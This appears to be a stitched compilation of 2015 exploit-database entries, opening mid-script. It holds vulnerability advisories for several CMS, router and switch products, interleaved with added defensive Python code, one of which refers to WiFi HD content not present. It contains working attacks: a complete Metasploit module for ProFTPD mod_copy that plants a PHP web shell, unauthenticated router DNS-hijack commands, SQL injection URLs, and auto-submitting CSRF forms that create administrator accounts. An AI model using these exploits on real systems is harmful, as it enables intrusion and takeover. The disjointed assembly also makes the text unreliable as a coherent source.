print "\t$0 <host> </dir/>\n";
print "\Ex: $0 127.0.0.1 /concrete/\n";
print "\Ex2: $0 target.com /\n\n";
exit();
};

# << ThE|End
            
source: https://www.securityfocus.com/bid/53616/info
 
Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
 
An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.
 
Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 


http://www.example.com/admin/file_manager/browse.asp?field=&form=&path=../../
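The WiFi HD requests earlier on this page (a leading-slash path such as /../../../../tmp/ in the URL, in the foldername field and in the multipart filename) and the Acuity CMS path=../../ request above are the same bug: a client-supplied path is joined onto the server's root without checking where it ends up. The Python below is an added example for this page, not code from either product; SHARE_ROOT is a hypothetical document root. It shows the careless join beside a resolver that decodes once, interprets every client path relative to the root and rejects anything that normalises to a location outside it.

```python
import posixpath
from urllib.parse import unquote

SHARE_ROOT = "/var/wifihd/share"   # hypothetical document root for the file service


def naive_resolve(root: str, requested: str) -> str:
    """What a careless server does: join and normalise, never check.

    posixpath.join() discards root entirely when the client path starts
    with '/', and normpath() walks '..' above root without complaint, so
    the advisory's '/../../../../etc/passwd' resolves to the real file.
    """
    return posixpath.normpath(posixpath.join(root, unquote(requested)))


def safe_resolve(root: str, requested: str):
    """Return the absolute path for a client-supplied path, or None if it
    would leave root.

    Handles both the leading-slash form used against WiFi HD and the
    relative '../../' form used against Acuity CMS.
    """
    decoded = unquote(requested)          # decode exactly once, never in a loop
    if "\x00" in decoded:                 # NUL would truncate the path in C APIs
        return None
    relative = decoded.lstrip("/")        # always interpret relative to root
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, relative))
    # The only acceptable results are root itself or something strictly below it.
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for path in ("/../../../../../../../../etc/passwd", "../../", "docs/readme.txt",
                 "%2e%2e/%2e%2e/etc/passwd", "/docs/../readme.txt"):
        print("%-40s naive=%-45s safe=%s" % (path, naive_resolve(SHARE_ROOT, path),
                                            safe_resolve(SHARE_ROOT, path)))
```

The prefix check must include the trailing slash: comparing against the bare root string would accept a sibling directory such as /var/wifihd/share_backup. Deletion and upload handlers should run the same resolver on the foldername and filename fields, since those are where the WiFi HD requests carry the traversal.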
            
source: https://www.securityfocus.com/bid/53640/info
 
Concrete CMS is prone to the following vulnerabilities because it fails to properly handle user-supplied input.
 
1. Multiple cross-site scripting vulnerabilities
 
2. An arbitrary-file-upload vulnerability
 
3. A denial-of-service vulnerability
 
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 
Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 


http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf
            
  D-Link DSL-2780B DLink_1.01.14 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!


[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1
            
  TP-Link ADSL2+ TD-W8950ND 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!


[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
            
Advisory ID: HTB23260
Product: ISPConfig
Vendor: http://www.ispconfig.org
Vulnerable Version(s): 3.0.5.4p6  and probably prior
Tested Version: 3.0.5.4p6 
Advisory Publication:  May 20, 2015  [without technical details]
Vendor Notification: May 20, 2015 
Vendor Patch: June 4, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-4118, CVE-2015-4119
Risk Level: High 
CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P),  7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in ISPConfig, a popular hosting control panel. The vulnerabilities can be exploited to execute arbitrary SQL commands in the application database, perform a CSRF attack and gain complete control over the web application.


1) SQL Injection in ISPConfig: CVE-2015-4118

The vulnerability exists due to insufficient filtration of input data passed via the "server" HTTP GET parameter to the "/monitor/show_sys_state.php" script before executing a SQL query. A remote authenticated attacker can pass arbitrary SQL commands to the vulnerable script and execute them in the application's database.

Successful exploitation of this vulnerability allows an attacker to read, insert and modify arbitrary records in the database and compromise the entire web application, but requires the attacker to be authenticated and to have "monitor" privileges. However, in combination with the CSRF vulnerability described below, it becomes exploitable by a remote non-authenticated attacker.

The simple exploit below displays the MySQL server version. First, use the following HTTP request to execute the SQL query:

https://[host]/monitor/show_sys_state.php?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|-

After that, visit the page below; the result of the MySQL 'version()' function is displayed in the HTML code of the page:

https://[host]/monitor/show_data.php?type=mem_usage
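As an added defensive example (not part of the advisory or of ISPConfig's code), the Python below does two things a defender would want here: it validates the "server" value as a plain integer id before it could reach a query, and it scans web-server access-log lines for calls to show_sys_state.php whose "server" parameter is not numeric. The log lines are constructed; the second one carries the request shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Apache "combined"-like form (not from a real host).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jun/2015:12:00:01 +0000] "GET /monitor/show_sys_state.php?state=server&server=1 HTTP/1.1" 200 512
198.51.100.9 - - [10/Jun/2015:12:00:05 +0000] "GET /monitor/show_sys_state.php?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|- HTTP/1.1" 200 512
198.51.100.9 - - [10/Jun/2015:12:00:06 +0000] "GET /monitor/show_data.php?type=mem_usage HTTP/1.1" 200 2048
198.51.100.11 - - [10/Jun/2015:12:00:09 +0000] "GET /monitor/show_sys_state.php?state=server&server=3 HTTP/1.1" 200 512
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A server id is a non-negative integer; anything else is not a legitimate value.
INTEGER_ID = re.compile(r"^\d+$")
MONITOR_SCRIPT = "/monitor/show_sys_state.php"


def validate_server_id(value):
    """Server-side guard: return the id as an int, or None if it is not a plain integer.
    Casting (or binding the value as a query parameter) is what removes the injection."""
    if not INTEGER_ID.match(value):
        return None
    return int(value)


def parse_line(line):
    """Split one access-log line into ip, time, path and decoded query parameters."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": url.path,
        "params": parse_qs(url.query, keep_blank_values=True),
    }


def is_suspicious(record):
    """True when show_sys_state.php was called with a non-integer 'server' value."""
    if record["path"] != MONITOR_SCRIPT:
        return False
    return any(validate_server_id(v) is None for v in record["params"].get("server", []))


def find_suspicious(log_text):
    """Return (ip, time, decoded server value) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_suspicious(rec):
            hits.append((rec["ip"], rec["time"], rec["params"]["server"][0]))
    return hits


if __name__ == "__main__":
    for ip, when, value in find_suspicious(SAMPLE_LOG):
        print(f"{when} {ip} non-numeric server parameter: {value!r}")
```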


2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119

The vulnerability exists because the "/admin/users_edit.php" script does not verify the origin of the HTTP request. A remote attacker can create a specially crafted web page with a CSRF exploit, trick a logged-in administrator into visiting it, and thereby create a new user with administrative privileges.

The simple CSRF exploit below creates an administrative account with username "immuniweb" and password "immuniweb":


<form action = "https://[host]/admin/users_edit.php" method = "POST" enctype = "multipart/form-data">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="passwort" value="immuniweb">
<input type="hidden" name="repeat_password" value="immuniweb">
<input type="hidden" name="modules[]" value="vm">
<input type="hidden" name="modules[]" value="mail">
<input type="hidden" name="modules[]" value="help">
<input type="hidden" name="modules[]" value="monitor">
<input type="hidden" name="startmodule" value="vm">
<input type="hidden" name="app_theme[]" value="default">
<input type="hidden" name="typ[]" value="admin">
<input type="hidden" name="active" value="1">
<input type="hidden" name="language" value="en">
<input type="submit" id="btn"> 
</form>
<script>
document.getElementById('btn').click();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to ISPConfig 3.0.5.4p7

More Information:
http://bugtracker.ispconfig.org/index.php?do=details&task_id=3898

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23260 - https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in ISPConfig.
[2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
            
Advisory ID: HTB23259
Product: Bonita BPM
Vendor: Bonitasoft
Vulnerable Version(s):  6.5.1  and probably prior 
Tested Version:  6.5.1 (Windows and Mac OS packages)
Advisory Publication:  May 7, 2015  [without technical details]
Vendor Notification: May 7, 2015 
Vendor Patch: June 9, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
CVE References: CVE-2015-3897, CVE-2015-3898
Risk Level: High 
CVSSv2 Base Scores: 7.8  (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in Bonita BPM Portal (Bonita's web interface, which by default runs on port 8080). They can be exploited by a remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted.

1) Path Traversal in Bonita BPM Portal: CVE-2015-3897

User-supplied input passed via the "theme" and "location" HTTP GET parameters to the "bonita/portal/themeResource" URL is not properly verified before being used as part of a file name. An attacker may download any file on the system that is accessible to the web server user.

The simple PoC below returns the content of the "C:/Windows/system.ini" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini

The second PoC discloses the content of the "/etc/passwd" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd


2) Open Redirect in Bonita BPM Portal: CVE-2015-3898

Input passed via the "redirectUrl" HTTP GET parameter to the "/bonita/login.jsp" script and the "/bonita/loginservice" URL is not properly verified before being used as a redirect URL.

After login, the user may be redirected to an arbitrary website:

http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/


-----------------------------------------------------------------------------------------------

Solution:

Update to Bonita BPM 6.5.3

More Information:
http://community.bonitasoft.com/blog/bonita-bpm-653-available

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM.
[2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
            
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

During a penetration test, RedTeam Pentesting discovered a vulnerability
in the management web interface of an Alcatel-Lucent OmniSwitch 6450.
The management web interface has no protection against cross-site
request forgery attacks. This allows specially crafted web pages to
change the switch configuration and create users, if an administrator
accesses the website while being authenticated in the management web
interface.

Details
=======

Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400,
  6855, 6900, 10K, 6860
Affected Versions: All Releases:
  AOS 6.4.5.R02
  AOS 6.4.6.R01
  AOS 6.6.4.R01
  AOS 6.6.5.R02
  AOS 7.3.2.R01
  AOS 7.3.3.R01
  AOS 7.3.4.R01
  AOS 8.1.1.R01
Fixed Versions: -
Vulnerability Type: Cross-site request forgery
Security Risk: medium
Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
Advisory Status: published
CVE: CVE-2015-2805
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805


Introduction
============

"The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable
LAN Switches are the latest value stackable switches in the OmniSwitch
family of products. The OmniSwitch 6450 was specifically built for
versatility offering optional upgrade paths for 10 Gigabit stacking, 10
Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and
Metro Ethernet services."

(from the vendor's homepage)

More Details
============

The management web interface of the OmniSwitch 6450 can be accessed
using a web browser via HTTP. The web interface allows creating new user
accounts, in this case an HTTP request like the following is sent to the
switch:

  POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
  Host: 192.0.2.1
  [...]
  Cookie: session=sess_15739
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 214

  EmWeb_ns:mip:2.T1:I1=attacker
  &EmWeb_ns:mip:244.T1:O1=secret
  &EmWeb_ns:mip:246.T1:O2=-1
  &EmWeb_ns:mip:248.T1:O3=
  &EmWeb_ns:mip:249.T1:O4=1
  &EmWeb_ns:mip:250.T1:O5=4

This request creates a user "attacker" with the password "secret". All
other parameters are static, so every POST parameter can be predicted by
an attacker.

This means that requests of this form can be prepared by attackers and sent
from any web page the user visits in the same browser. If the user is
authenticated to the switch, a valid session cookie is included in the request
automatically, and the action is performed.

In order to activate the new user for the web interface it is necessary
to enable the respective access privileges in the user's profile. This can also
be done via the web interface. Then the HTTP POST request looks like the
following:

  POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
  Host: 192.0.2.1
  [...]
  Cookie: session=sess_15739
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 167

  EmWeb_ns:mip:2.T1:I1=attacker
  &EmWeb_ns:mip:4.T1:O1=
  &EmWeb_ns:mip:5.T1:O2=
  &EmWeb_ns:mip:6.T1:O3=4294967295
  &EmWeb_ns:mip:7.T1:O4=4294967295

This request sets all access privileges for the user "attacker" and
is again completely predictable.


Proof of Concept
================

Visiting the following HTML page will create a new user via the switch's
management web interface, if the user is authenticated at the switch:

------------------------------------------------------------------------
<html>
<head>
<title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
</head>
<body>
  <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html"
  method="POST" id="CSRF" style="visibility:hidden">
    <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />
  </form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
------------------------------------------------------------------------


Workaround
==========

Disable the web interface by executing the following commands:

AOS6:

  no ip service http
  no ip service secure-http

AOS 7/8:

  ip service http admin-state disable

If this is not possible, use a dedicated browser or browser profile for
managing the switch via the web interface.


Fix
===

Upgrade the firmware to a fixed version, according to the vendor the
fixed versions will be available at the end of July 2015.


Security Risk
=============

If attackers trick a logged-in administrator into visiting an attacker-controlled
web page, they can perform actions and reconfigure the switch. In this
situation an attacker can create an additional user account on the switch for
future access. While a successful attack results in full access to the switch,
it is hard to carry out because attackers need to know the IP address of
the switch and get an administrative user to access an attacker-controlled web
page. The vulnerability is therefore rated as a medium risk.


Timeline
========

2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the filesystem to a chosen destination. The copy commands are executed with
          the rights of the ProFTPD service, which by default runs under the privileges of the
          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
          directory, PHP remote code execution is made possible.
      },
      'Author'         =>
        [
          'Vadim Melihow', # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars' => '',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic gawk bash python perl'
            }
        },
      'Targets'        =>
        [
          [ 'ProFTPD 1.3.5', { } ]
        ],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget' => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'HTTP port', 80]),
        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
      ], self.class)
  end

  def check
    ftp_port = datastore['RPORT_FTP']
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    sock.puts("SITE CPFR /etc/passwd\r\n")
    res = sock.get_once(-1, 10)
    if res && res.include?('350')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    ftp_port = datastore['RPORT_FTP']
    get_arg = rand_text_alphanumeric(5+rand(3))
    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'

    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")

    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
    end

    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
    end

    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
    end

    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
    end

    sock.close

    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, payload_name),
      'method' => 'GET',
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
    end
  end

end
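As an added defensive example (not part of the module above or of ProFTPD), the Python below walks FTP command/response records and flags the mod_copy pattern the module relies on: SITE CPFR/CPTO issued before any successful login, a copy source under /proc or /etc, or a copy destination inside a web root or ending in .php. The log lines are constructed in a simple "time client command reply-code" form; a real ExtendedLog format differs, so LINE_RE and WEB_ROOTS are assumptions to adapt.

```python
import re

# Constructed records (not real server output). The first four reproduce the sequence
# the module sends; the last four are a benign, authenticated copy inside a home dir.
SAMPLE_LOG = """\
12:00:01 198.51.100.9 SITE CPFR /proc/self/cmdline 350
12:00:01 198.51.100.9 SITE CPTO /tmp/.<?php passthru($_GET['q']);?> 250
12:00:02 198.51.100.9 SITE CPFR /tmp/.<?php passthru($_GET['q']);?> 350
12:00:02 198.51.100.9 SITE CPTO /var/www/x7kq2.php 250
12:05:10 203.0.113.4 USER alice 331
12:05:11 203.0.113.4 PASS ******** 230
12:05:20 203.0.113.4 SITE CPFR /home/alice/report.txt 350
12:05:20 203.0.113.4 SITE CPTO /home/alice/backup/report.txt 250
"""

# Reply code is always the last field, so the command text may contain spaces.
LINE_RE = re.compile(r"^(?P<time>\S+) (?P<client>\S+) (?P<cmd>.+) (?P<code>\d{3})$")
WEB_ROOTS = ("/var/www",)            # assumed document roots of the host
SENSITIVE_PREFIXES = ("/proc/", "/etc/")


def analyse(log_text, web_roots=WEB_ROOTS):
    """Return (time, client, command, reasons) for every suspicious mod_copy command."""
    authenticated = set()            # clients that completed PASS with reply 230
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        client, cmd, code = m["client"], m["cmd"], m["code"]
        parts = cmd.split(" ", 2)
        if parts[0] == "PASS" and code == "230":
            authenticated.add(client)
            continue
        if parts[0] != "SITE" or len(parts) < 3 or parts[1] not in ("CPFR", "CPTO"):
            continue
        sub, path = parts[1], parts[2]
        reasons = []
        if client not in authenticated:
            # mod_copy in 1.3.5 accepts these without a login; that alone is the bug
            reasons.append("mod_copy command before login")
        if sub == "CPFR" and path.startswith(SENSITIVE_PREFIXES):
            reasons.append("copy source outside user data")
        if sub == "CPTO" and (path.startswith(web_roots) or path.endswith(".php")):
            reasons.append("copy destination is web-served or executable")
        if reasons:
            findings.append((m["time"], client, f"SITE {sub} {path}", reasons))
    return findings


if __name__ == "__main__":
    for when, client, command, reasons in analyse(SAMPLE_LOG):
        print(when, client, command, "->", "; ".join(reasons))
```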
            
# Title: CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4
# Submitter: Nitin Venkatesh
# Product: Encrypted Contact Form Wordpress Plugin
# Product URL: https://wordpress.org/plugins/encrypted-contact-form/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site Scripting [CWE-79]
# Affected Versions: v1.0.4 and possibly below.
# Tested versions: v1.0.4
# Fixed Version: v1.1
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/
# Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/
# CVE Status: CVE-2015-4010

## Product Information:

Secure contact form for WordPress. Uses end-to-end encryption to send user
information. Not even your hosting provider can view the content.

Let users send you information in a secure way. Uses I.CX messaging service
to encrypt user content in their own web browsers before sending to you.

## Vulnerability Description:

The forms in the admin area of the plugin are vulnerable to CSRF, and the
contact forms they generate are susceptible to XSS via an unsanitized POST
parameter.

For example, the admin function that updates an existing form can be
triggered via CSRF. Hence, by submitting a crafted HTML string in the
parameters via CSRF, an XSS payload is stored that affects all visitors of
the page(s) containing the contact form.

## Proof of Concept:

<form action="http://localhost/wp-admin/options-general.php?page=conformconf"
method="post">
<input type="hidden" name="name" value="required" />
<input type="hidden" name="email" value="optional" />
<input type="hidden" name="phone" value="off" />
<input type="hidden" name="message" value="required" />
<input type="hidden" name="display_name" value="Example" />
<input type="hidden" name="recipient_name" value="example" />
<input type="hidden" name="cfc_page_name" value="" />
<!-- Wordpress page-id value -->
<input type="hidden" name="existing_page" value="28" />
<input type="hidden" name="cfc_selection" value="upd" />
<input type="hidden" name="iframe_url"
value=""></iframe><script>alert('XSS!');</script>"
/>
<input type="submit" value="Update Page">
</form>

## Solution:

Upgrade to v1.1 of the plugin.

## Disclosure Timeline:

2015-03-26 - Discovered. Contacted developer on support forums.
2015-03-27 - Contacted developer via contact form on vendor site.
2015-04-01 - Fixed v1.1 released.
2015-05-15 - Published disclosure on FD.
2015-05-16 - CVE assigned

## References:

CVE Assign - http://seclists.org/oss-sec/2015/q2/471
http://packetstormsecurity.com/files/131955/
https://wpvulndb.com/vulnerabilities/7992


## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
            
# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability
# Date: 2015/06/07 
# Vendor Homepage: http://dg.no.sapo.pt/ 
# Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip
# Version: 2.6
# Tested on: Centos 6.5, php 5.3.2, magic_quotes_gpc=off
# Category: webapps

* Description

func.php
line 21 - 22:

include('themes/'.$THEME.'/templates.php');
include('languages/'.$LANG.'.php');

The $THEME and $LANG values come from the import_theme_lang() function:

function import_theme_lang()
{
  $THEME = DEFAULT_THEME;
  if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
    $THEME = $_COOKIE['theme'];  // <-- no taint checking

  $LANG = DEFAULT_LANG;
